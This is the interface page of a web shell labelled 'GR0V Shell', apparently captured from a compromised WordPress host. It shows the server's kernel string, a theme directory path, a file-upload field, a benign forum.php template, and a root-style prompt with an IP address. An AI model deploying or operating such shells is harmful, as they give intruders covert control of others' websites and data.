? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.net/public_html/wp-content/themes/asteroid/
File Upload :
Current File : /home/admin/domains/happytokorea.net/public_html/wp-content/themes/asteroid/forum.php

<?php get_header(); ?>

<?php 
if (
	( ( get_post_type() == 'topic' ) && ( asteroid_option('ast_bbpress_topic_full_width') == 1 ) ) ||
	( ( get_post_type() != 'topic' ) && ( asteroid_option('ast_bbpress_forum_full_width') == 1 ) ) 
) :
?>
	<div id="content-nosidebar">
<?php else : ?>
	<div id="content">
<?php endif; ?>
	<?php do_action('ast_hook_before_content'); ?>

    <?php
		the_post();
		get_template_part( 'loop', 'single' );
    ?>

	<?php do_action('ast_hook_after_content'); ?>
	</div>

<?php
if (
	( ( get_post_type() == 'topic' ) && ( asteroid_option('ast_bbpress_topic_full_width') == 0 ) ) ||
	( ( get_post_type() != 'topic' ) && ( asteroid_option('ast_bbpress_forum_full_width') == 0 ) ) 
) :
?>
	<?php get_sidebar(); ?>
<?php endif; ?>

<?php get_footer(); ?>

T1KUS90T
  root-grov@210.1.60.28:~$